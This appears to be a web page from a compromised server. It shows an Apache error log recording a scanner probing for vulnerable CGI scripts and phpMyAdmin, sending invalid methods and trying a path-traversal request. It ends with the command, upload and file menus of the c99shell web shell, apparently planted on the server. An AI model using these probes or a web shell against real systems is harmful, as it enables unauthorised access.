[Wed Sep 29 21:39:31.347744 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35076] script not found or unable to stat: E:/nuevo/cgi-bin/CGImail.exe
[Wed Sep 29 21:39:31.472545 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35076] script not found or unable to stat: E:/nuevo/cgi-bin/contents.htm
[Wed Sep 29 21:39:31.612945 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35076] script not found or unable to stat: E:/nuevo/cgi-bin/fpadmin.htm
[Wed Sep 29 21:39:31.722145 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35076] script not found or unable to stat: E:/nuevo/cgi-bin/fpremadm.exe
[Wed Sep 29 21:39:31.831345 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35076] script not found or unable to stat: E:/nuevo/cgi-bin/fpsrvadm.exe
[Wed Sep 29 21:39:36.885754 2021] [proxy:error] [pid 10816:tid 21000] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:39:36.885754 2021] [proxy_ajp:error] [pid 10816:tid 21000] [client 65.94.34.16:35076] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:39:38.196156 2021] [proxy:error] [pid 10816:tid 21000] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:39:38.196156 2021] [proxy_ajp:error] [pid 10816:tid 21000] [client 65.94.34.16:35078] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:39:39.418360 2021] [proxy:error] [pid 10816:tid 21000] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:39:39.418360 2021] [proxy_ajp:error] [pid 10816:tid 21000] [client 65.94.34.16:35080] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:39:40.697562 2021] [proxy:error] [pid 10816:tid 21000] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:39:40.697562 2021] [proxy_ajp:error] [pid 10816:tid 21000] [client 65.94.34.16:35082] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:39:41.976764 2021] [proxy:error] [pid 10816:tid 21000] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:39:41.976764 2021] [proxy_ajp:error] [pid 10816:tid 21000] [client 65.94.34.16:35084] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:39:43.224766 2021] [proxy:error] [pid 10816:tid 21000] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:39:43.224766 2021] [proxy_ajp:error] [pid 10816:tid 21000] [client 65.94.34.16:35086] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:39:44.488369 2021] [proxy:error] [pid 10816:tid 21000] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:39:44.488369 2021] [proxy_ajp:error] [pid 10816:tid 21000] [client 65.94.34.16:35088] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:39:45.783171 2021] [proxy:error] [pid 10816:tid 21000] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:39:45.783171 2021] [proxy_ajp:error] [pid 10816:tid 21000] [client 65.94.34.16:35090] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:39:47.920375 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35092] script not found or unable to stat: E:/nuevo/cgi-bin/cgi-test.exe
[Wed Sep 29 21:39:54.534786 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35092] script not found or unable to stat: E:/nuevo/cgi-bin/printenv
[Wed Sep 29 21:39:54.643986 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35092] script not found or unable to stat: E:/nuevo/cgi-bin/printenv
[Wed Sep 29 21:39:54.753187 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35092] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi
[Wed Sep 29 21:39:54.877987 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35092] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi
[Wed Sep 29 21:39:58.653193 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35092] AH00135: Invalid method in request SEARCH / HTTP/1.1
[Wed Sep 29 21:40:01.726399 2021] [proxy:error] [pid 10816:tid 21000] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:40:01.726399 2021] [proxy_ajp:error] [pid 10816:tid 21000] [client 65.94.34.16:35094] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:40:02.412800 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/htdocs/search.asp
[Wed Sep 29 21:40:05.174005 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/htdocs/search.asp
[Wed Sep 29 21:40:06.562407 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] AH00038: Forbidden: E:/nuevo/htdocs/nul doesn't point to a file or directory
[Wed Sep 29 21:40:06.671608 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] AH00038: Forbidden: E:/nuevo/htdocs/nul doesn't point to a file or directory
[Wed Sep 29 21:40:06.780808 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] AH00038: Forbidden: E:/nuevo/htdocs/nul doesn't point to a file or directory
[Wed Sep 29 21:40:06.890008 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] AH00038: Forbidden: E:/nuevo/htdocs/nul doesn't point to a file or directory
[Wed Sep 29 21:40:06.999208 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/imagemap
[Wed Sep 29 21:40:07.108408 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/imagemap.exe
[Wed Sep 29 21:40:07.233209 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/htimage.exe
[Wed Sep 29 21:40:07.342409 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/htimage.exe
[Wed Sep 29 21:40:07.451609 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/htimage.exe
[Wed Sep 29 21:40:09.198812 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/bbcode_ref.php
[Wed Sep 29 21:40:09.994413 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/GW5
[Wed Sep 29 21:40:10.337614 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/GW5
[Wed Sep 29 21:40:10.446814 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/GWWEB.EXE
[Wed Sep 29 21:40:12.038017 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/vote.cgi
[Wed Sep 29 21:40:12.147217 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/quizme.cgi
[Wed Sep 29 21:40:12.927219 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/sendform.cgi
[Wed Sep 29 21:40:13.036419 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/htdocs/boilerplate.asp
[Wed Sep 29 21:40:13.488820 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/FileSeek.cgi
[Wed Sep 29 21:40:13.598020 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/FileSeek.cgi
[Wed Sep 29 21:40:13.722820 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/FileSeek2.cgi
[Wed Sep 29 21:40:13.832020 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/FileSeek2.cgi
[Wed Sep 29 21:40:13.956820 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/FileSeek.cgi
[Wed Sep 29 21:40:14.081621 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/FileSeek.cgi
[Wed Sep 29 21:40:14.190821 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/FileSeek2.cgi
[Wed Sep 29 21:40:14.300021 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/FileSeek2.cgi
[Wed Sep 29 21:40:15.750823 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Wed Sep 29 21:40:15.969224 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/export.php
[Wed Sep 29 21:40:16.671225 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/dcforum.cgi
[Wed Sep 29 21:40:19.229630 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/gettransbitmap
[Wed Sep 29 21:40:19.370030 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/guestbook.cgi
[Wed Sep 29 21:40:19.713230 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/main_menu.pl
[Wed Sep 29 21:40:20.727232 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/rtm.log
[Wed Sep 29 21:40:20.836432 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/VsSetCookie.exe
[Wed Sep 29 21:40:21.507234 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/powerup
[Wed Sep 29 21:40:21.616434 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/r.cgi
[Wed Sep 29 21:40:21.725634 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/Webnews.exe
[Wed Sep 29 21:40:21.834834 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/webnews.pl
[Wed Sep 29 21:40:21.959634 2021] [core:error] [pid 10816:tid 21000] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35096] AH00127: Cannot map GET /.../.../.../ HTTP/1.1 to file
[Wed Sep 29 21:40:22.068835 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/texis.exe
[Wed Sep 29 21:40:22.178035 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/texis
[Wed Sep 29 21:40:22.521235 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/apexec.pl
[Wed Sep 29 21:40:23.082836 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35096] script not found or unable to stat: E:/nuevo/cgi-bin/sensepost.exe
[Wed Sep 29 22:16:08.019811 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 22:30:20.159312 2021] [core:error] [pid 10816:tid 21168] [client 65.94.34.16:35164] AH00135: Invalid method in request \xff\xed\xff\xfd\x06\xff\xf4\xff\xfd\x06z
[Wed Sep 29 23:07:18.569019 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 23:41:56.221675 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 23:45:06.702009 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]--